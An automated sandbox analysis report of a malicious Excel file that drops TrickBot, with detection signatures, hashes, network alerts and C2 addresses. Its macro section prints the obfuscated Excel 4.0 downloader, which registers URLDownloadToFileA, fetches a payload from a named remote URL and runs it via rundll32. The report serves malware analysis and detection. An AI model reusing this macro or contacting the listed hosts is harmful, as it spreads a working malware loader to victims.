Analysis Report SecuriteInfo.com.Exploit.Siggen3.10350.12632.7055
Overview
General Information
Sample Name: | SecuriteInfo.com.Exploit.Siggen3.10350.12632.7055 (renamed file extension from 7055 to xls) |
Analysis ID: | 355602 |
MD5: | 422030b616989ef7bf2f56a2f266068f |
SHA1: | 04ec47e9f08ed7e4861c6f252a381faee4283bf9 |
SHA256: | 6f1c23f3d7e471cf0c4a91f59c94853128413b84065ef42ad2065337b973beab |
Most interesting Screenshot: |
Detection
Hidden Macro 4.0 TrickBot
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Document exploit detected (drops PE files)
Found malicious Excel 4.0 Macro
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Trickbot
Allocates memory in foreign processes
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query network adapter information
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
SUSP_Excel4Macro_AutoOpen | Detects Excel4 macro use with auto open / close | John Lambert @JohnLaTwC |
|
Memory Dumps |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | |
Unpacked PEs |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | |
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: Microsoft Office Product Spawning Windows Shell |
Source: | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: |
Signature Overview |
---|
AV Detection: |
---|
Antivirus detection for URL or domain |
Source: | Avira URL Cloud: |
Multi AV Scanner detection for submitted file |
Source: | ReversingLabs: |
Source: | Code function: |
Compliance: |
---|
Uses new MSVCR Dlls |
Source: | File opened: |
Binary contains paths to debug symbols |
Source: | Binary string: |
Source: | Code function: |
Software Vulnerabilities: |
---|
Document exploit detected (drops PE files) |
Source: | File created: |
Document exploit detected (UrlDownloadToFile) |
Source: | Section loaded: |
Document exploit detected (process start blacklist hit) |
Source: | Process created: |
Source: | Memory has grown: |
Source: | Code function: |
Source: | DNS query: |
Source: | TCP traffic: |
Networking: |
---|
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) |
Source: | Snort IDS: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | HTTP traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: |
Source: | File created: |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: |
Source: | Network traffic detected: |
System Summary: |
---|
Found malicious Excel 4.0 Macro |
Source: | Initial sample: |
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) |
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas |
Source: | Initial sample: |
Office process drops PE file |
Source: | File created: |
Source: | Memory allocated: |
Source: | Code function: |
Source: | Code function: |
Source: | OLE indicator, VBA macros: |
Source: | Dropped File: |
Source: | Matched rule: |
Source: | Binary or memory string: |
Source: | Classification label: |
Source: | Code function: |
Source: | File created: |
Source: | Mutant created: |
Source: | File created: |
Source: | OLE indicator, Workbook stream: |
Source: | System information queried: |
Source: | File read: |
Source: | Key opened: |
Source: | Process created: |
Source: | ReversingLabs: |
Source: | Process created: |
Source: | Window detected: |
Source: | Key opened: |
Source: | File opened: |
Source: | Binary string: |
Source: | Code function: |
Source: | File created: |
Source: | File created: |
Source: | File created: |
Boot Survival: |
---|
Drops PE files to the user root directory |
Source: | File created: |
Source: | Process information set: |
Malware Analysis System Evasion: |
---|
Found evasive API chain (trying to detect sleep duration tampering with parallel thread) |
Source: | Function Chain: |
Tries to detect virtualization through RDTSC time measurements |
Source: | RDTSC instruction interceptor: |
Source: | Code function: |
Source: | Code function: |
Source: | Dropped PE file which has not been started: |
Source: | Last function: |
Source: | Code function: |
Source: | Code function: |
Source: | Code function: |
Source: | Code function: |
Source: | Code function: |
HIPS / PFW / Operating System Protection Evasion: |
---|
Allocates memory in foreign processes |
Source: | Memory allocated: |
Writes to foreign memory regions |
Source: | Memory written: |
Source: | Process created: |
Source: | Binary or memory string: |
Source: | Queries volume information: |
Stealing of Sensitive Information: |
---|
Yara detected Trickbot |
Source: | File source: |
Remote Access Functionality: |
---|
Yara detected Trickbot |
Source: | File source: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting21 | Path Interception | Access Token Manipulation1 | Masquerading121 | OS Credential Dumping | Security Software Discovery12 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel22 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Native API1 | Boot or Logon Initialization Scripts | Process Injection212 | Disable or Modify Tools2 | LSASS Memory | Process Discovery2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | Exploitation for Client Execution33 | Logon Script (Windows) | Extra Window Memory Injection1 | Access Token Manipulation1 | Security Account Manager | System Network Configuration Discovery1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection212 | NTDS | File and Directory Discovery2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol13 | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting21 | LSA Secrets | System Information Discovery113 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information2 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Rundll321 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Extra Window Memory Injection1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |
Behavior Graph |
---|
Screenshots |
---|
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
26% | ReversingLabs | Document-Word.Downloader.EncDoc |
Dropped Files |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
6% | ReversingLabs | Win32.Trojan.Trickpak | ||
6% | ReversingLabs | Win32.Trojan.Trickpak |
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | malware | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
chipmania.it | 185.81.0.78 | true | false | unknown | |
www.chipmania.it | unknown | unknown | false | unknown | |
api.ip.sb | unknown | unknown | false | unknown |
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
| true | | unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
| | false | | high |
| | false | | high |
| | false | | high |
| | false | | high |
| | false | | unknown |
| | false | | high |
| | false | | unknown |
| | false | | high |
| | false | | low |
| | false | | unknown |
| | false | | high |
| | false | | low |
| | false | | unknown |
Contacted IPs |
---|
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
185.81.0.78 | unknown | Italy | 52030 | SERVERPLAN-ASIT | false | |
200.52.147.93 | unknown | Honduras | 27932 | RedesyTelecomunicacionesHN | true |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 355602 |
Start date: | 20.02.2021 |
Start time: | 02:15:52 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 6m 43s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | SecuriteInfo.com.Exploit.Siggen3.10350.12632.7055 (renamed file extension from 7055 to xls) |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 8 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.troj.expl.evad.winXLS@9/7@3/2 |
EGA Information: | Failed |
HDC Information: |
|
HCA Information: | Failed |
Cookbook Comments: |
|
Warnings: |
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
02:16:42 | API Interceptor | |
02:16:42 | API Interceptor |
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
185.81.0.78 | | | malicious | | |
200.52.147.93 | | | malicious | | |
Domains |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
RedesyTelecomunicacionesHN | | | malicious | | |
SERVERPLAN-ASIT | | | malicious | | |
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\8[1].jjkes | | | malicious | | |
C:\Users\user\BASE.BABAA | | | malicious | | |
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 4591104 |
Entropy (8bit): | 5.0540147937501265 |
Encrypted: | false |
SSDEEP: | 49152:7SkyvIo/YMOZswCkQzvhtawebv5hW2/yF//4VPQw:NCetO//S9 |
MD5: | 25056DF6D3546DE971EAFE5DA5F9AE44 |
SHA1: | 179555B3D0391E45DF29E651B8ED0342D02FE88A |
SHA-256: | AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB |
SHA-512: | 8032A5BD9B07ACCC290B24FD2AFA299AFD12214026089665836FADE7282F0D217FFD79F5A3A12FD64E0E08D4F6FA0A04A8B036B4CDC1F95356B0BF43D6A80B50 |
Malicious: | true |
Antivirus: |
|
Joe Sandbox View: |
|
Reputation: | moderate, very likely benign file |
IE Cache URL: | http://www.chipmania.it/mails/open.php |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 155530 |
Entropy (8bit): | 7.660505379704475 |
Encrypted: | false |
SSDEEP: | 3072:YxWVpupSzxNEBBD+Os7/xxkKCtRbsYO1entseoXXF:YEGSzx0dmxk7RbsYsKtseoX1 |
MD5: | 3CFBC6707341EF2AF668B0B66554A0D8 |
SHA1: | 2E47F97B737C1885E37322D4789B67BC79D0625F |
SHA-256: | BE269837B25164FC761785BE33AEB7A7ADAC5138AB3C081BA678F310A6674FEA |
SHA-512: | 1BE89DB6402BB1F07AA271C8E58AE75BB2AEAF20200EBCF118484AC8F7D5E9DF96D0C3B6A1AEE88F6197E85287D54645CE67D01B8835D8E737657521F0D6F954 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.471936882845852 |
Encrypted: | false |
SSDEEP: | 12:85QfAVNcLgXg/XAlCPCHaXgzB8IB/8PHxX+WnicvbTfbDtZ3YilMMEpxRljKw6Tg:85bNK/XTwz6IGxYeHDDv3q+rNru/ |
MD5: | 8095CD6291864E260C361BF1A10EA172 |
SHA1: | 752607AC2889B2E58D3EB31D7947D618A2A37059 |
SHA-256: | 1F3839B20BF958449313BD88CD52DB6CA36AFD3400648086ACF7BB7288B5BCCF |
SHA-512: | 4A8F9A3FCDEB7971FF3E2DFEF08F72611E5EF85FCC09D8EB8C8F142BD7DAD142FA28F46FA586CECCB02B7772C6DD3919BA03337800A54604CA773A56D69CA6B0 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2368 |
Entropy (8bit): | 4.571681128279049 |
Encrypted: | false |
SSDEEP: | 48:8W/XT3IHvjHCEsfHC4+Qh2W/XT3IHvjHCEsfHC4+Q/:8W/XLILiW4+Qh2W/XLILiW4+Q/ |
MD5: | 219D84A5D4271A1B5652936B567E0447 |
SHA1: | F7BFF2FDA0916098A953AA4ECE644FAD43285EC7 |
SHA-256: | 2BA7892A29E9B37D1FB472361CC3276B8FFD38D38C54B974012B2D3301FD714C |
SHA-512: | E796B5EABBC8E454C63A8BBB9FC8DBE5BD42B7E5C698238B5BD77EA2538050A10CED8415D13E5EC7B94A9A539BE6B62A7DD14706A909EF611EF8F897D2BD7354 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 185 |
Entropy (8bit): | 4.876408116811588 |
Encrypted: | false |
SSDEEP: | 3:oyBVomM0bcsoMW4CuscbcsoMW4CmM0bcsoMW4Cv:dj60wsoMWOwsoMWR0wsoMWV |
MD5: | 0705594BE5F4187688CFE5334909ABDC |
SHA1: | 321F5868568FDED9259F861BA40960D027D6A794 |
SHA-256: | BF282C362016DCFDBABDBE3DB34A3394434CE9EF8FFF9A7E0B3F6AAC1071BD6D |
SHA-512: | 4788B12278CAF8CE9C9782BE378B3464EDE8D0546D14DFC0965540C1E11EA692A468D7816FD0A72C10C11ABBAC473701E05E56CA4FCB4D8B7A61A21FA1F475B7 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 4591104 |
Entropy (8bit): | 5.0540147937501265 |
Encrypted: | false |
SSDEEP: | 49152:7SkyvIo/YMOZswCkQzvhtawebv5hW2/yF//4VPQw:NCetO//S9 |
MD5: | 25056DF6D3546DE971EAFE5DA5F9AE44 |
SHA1: | 179555B3D0391E45DF29E651B8ED0342D02FE88A |
SHA-256: | AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB |
SHA-512: | 8032A5BD9B07ACCC290B24FD2AFA299AFD12214026089665836FADE7282F0D217FFD79F5A3A12FD64E0E08D4F6FA0A04A8B036B4CDC1F95356B0BF43D6A80B50 |
Malicious: | true |
Antivirus: |
|
Joe Sandbox View: |
|
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 177025 |
Entropy (8bit): | 7.239939848374362 |
Encrypted: | false |
SSDEEP: | 3072:zccKoSsxzNDZLDZjlbR868O8KL5L+4iK2xEtjPOtioVjDGUU1qfDlaGGx+cL2Qnr:4cKoSsxzNDZLDZjlbR868O8KL5L+4iKf |
MD5: | 8C6E6E3B60E506C0CCA7F66BBB581A1A |
SHA1: | 04F6ABD1996A42A02763B9F32DA952A7FDEDE7A0 |
SHA-256: | CF2F697E24C0B014B1513632471C307F9DCF141C34C44D5DF54297695457DD74 |
SHA-512: | 1BA5A33D57C5D082422E6431B7F53B57C971F2B97EE7C95C3B1D902E7F2B4B0F9D380EEC7F0CD56FAB6083A98710A0FF3B0657217B75748C6CF776277212F7C1 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.195176543915214 |
TrID: |
|
File name: | SecuriteInfo.com.Exploit.Siggen3.10350.12632.xls |
File size: | 168960 |
MD5: | 422030b616989ef7bf2f56a2f266068f |
SHA1: | 04ec47e9f08ed7e4861c6f252a381faee4283bf9 |
SHA256: | 6f1c23f3d7e471cf0c4a91f59c94853128413b84065ef42ad2065337b973beab |
SHA512: | bd90c0d5f31bc58456d179d753cfb1838a23312f2b0ea2aa01c9ed6223d9c72ee25929f60b6a85a65e800997b9fe745392379b4eb96a51bf94b2f903b41b2ec1 |
SSDEEP: | 3072:bScKoSsxzNDZLDZjlbR868O8KlVH3jiKq7uDphYHceXVhca+fMHLtyeGxcl8OUMn:OcKoSsxzNDZLDZjlbR868O8KlVH3jiKi |
File Content Preview: | ........................>.......................H...........................E...F...G.......................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | e4eea286a4b4bcb4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OLE | |
Number of OLE Files: | 1 |
OLE File "SecuriteInfo.com.Exploit.Siggen3.10350.12632.xls" |
---|
Indicators | |
---|---|
Has Summary Info: | True |
Application Name: | Microsoft Excel |
Encrypted Document: | False |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | True |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | True |
Summary | |
---|---|
Code Page: | 1251 |
Author: | |
Last Saved By: | |
Create Time: | 2006-09-16 00:00:00 |
Last Saved Time: | 2021-02-19 10:48:36 |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Document Code Page: | 1251 |
Thumbnail Scaling Desired: | False |
Contains Dirty Links: | False |
Shared Document: | False |
Changed Hyperlinks: | False |
Application Version: | 917504 |
Streams |
---|
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5DocumentSummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.357299206868 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 ec 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 ac 00 00 00 02 00 00 00 e3 04 00 00 |
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5SummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.247217286775 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 |
Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 157800 |
---|
General | |
---|---|
Stream Path: | Workbook |
File Type: | Applesoft BASIC program data, first line number 16 |
Stream Size: | 157800 |
Entropy: | 7.46869820242 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . f 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . . |
Data Raw: | 09 08 10 00 00 06 05 00 66 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 |
Macro 4.0 Code |
---|
,,,,,,,,,"=RIGHT(""353454543rtertetr,DllRegister"",12)&V19",,,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""KJHDFHURNVUTRSHYSTNLUURTHNBDZZLRDNYZru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&T19,40))",,,,,,,,=HALT(),,,
"=FORMULA.FILL(A144,DocuSign!V19)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""YJDYJGYDJNUDTUXTNXYXNuRlMon"",6)",,,,,,,,,,,,,,,,,,,"=RIGHT(""JDHNLTVJRBNZXKHTFHNMXTFUXTownloadToFileA"",14)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=REGISTER(D134,""URLD""&D135,""JJCC""&A146,""YUTVUBSRNYTMYM"",,1,9)",,,,,,,,,,,,,,,,,,,http://"=YUTVUBSRNYTMYM(0,T137&D144&E144&E145&E146&E147,D141,0,0)",,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""hLKUYFBGVESLTNZBRHYMHYRZndll32"",6)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""XCVBDSTYFGYSDUZGKLRDHZTDJ..\BASE.BABAA"",13)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=GOTO(DocuSign!T3),,,,,,,,,,,,,,,,,,,Server,,,www.chipmania.it/mails/open,.,,,,,,,,,,,,,,,,,,,p,,,,,,,,,,,,,,,BB,,,,h,,,,,,,,,,,,,,,,,,,p,,,,,,,,,,,,,,,
Network Behavior |
---|
Snort IDS Alerts |
---|
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
02/20/21-02:16:54.765622 | TCP | 2404324 | ET CNC Feodo Tracker Reported CnC Server TCP group 13 | 49166 | 443 | 192.168.2.22 | 200.52.147.93 |
02/20/21-02:18:53.303160 | TCP | 2404306 | ET CNC Feodo Tracker Reported CnC Server TCP group 4 | 49167 | 443 | 192.168.2.22 | 142.202.191.164 |
02/20/21-02:18:55.128222 | TCP | 2404320 | ET CNC Feodo Tracker Reported CnC Server TCP group 11 | 49169 | 443 | 192.168.2.22 | 193.8.194.96 |
02/20/21-02:18:55.532096 | TCP | 2021013 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC) | 443 | 49169 | 193.8.194.96 | 192.168.2.22 |
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Feb 20, 2021 02:16:43.609155893 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 20, 2021 02:16:43.670814037 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22 |
Feb 20, 2021 02:18:53.927275896 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 20, 2021 02:18:53.986989021 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22 |
Feb 20, 2021 02:18:53.993416071 CET | 52838 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 20, 2021 02:18:54.043324947 CET | 53 | 52838 | 8.8.8.8 | 192.168.2.22 |
Feb 20, 2021 02:18:56.465553999 CET | 61200 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 20, 2021 02:18:56.518466949 CET | 53 | 61200 | 8.8.8.8 | 192.168.2.22 |
Feb 20, 2021 02:18:56.523504972 CET | 49548 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 20, 2021 02:18:56.574853897 CET | 53 | 49548 | 8.8.8.8 | 192.168.2.22 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Feb 20, 2021 02:16:43.609155893 CET | 192.168.2.22 | 8.8.8.8 | 0x8c10 | Standard query (0) | A (IP address) | IN (0x0001) | |
Feb 20, 2021 02:18:56.465553999 CET | 192.168.2.22 | 8.8.8.8 | 0xa6ed | Standard query (0) | A (IP address) | IN (0x0001) | |
Feb 20, 2021 02:18:56.523504972 CET | 192.168.2.22 | 8.8.8.8 | 0x4a40 | Standard query (0) | A (IP address) | IN (0x0001) | |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Feb 20, 2021 02:16:43.670814037 CET | 8.8.8.8 | 192.168.2.22 | 0x8c10 | No error (0) | chipmania.it | CNAME (Canonical name) | IN (0x0001) | ||
Feb 20, 2021 02:16:43.670814037 CET | 8.8.8.8 | 192.168.2.22 | 0x8c10 | No error (0) | 185.81.0.78 | A (IP address) | IN (0x0001) | ||
Feb 20, 2021 02:18:56.518466949 CET | 8.8.8.8 | 192.168.2.22 | 0xa6ed | No error (0) | api.ip.sb.cdn.cloudflare.net | CNAME (Canonical name) | IN (0x0001) | ||
Feb 20, 2021 02:18:56.574853897 CET | 8.8.8.8 | 192.168.2.22 | 0x4a40 | No error (0) | api.ip.sb.cdn.cloudflare.net | CNAME (Canonical name) | IN (0x0001) | ||
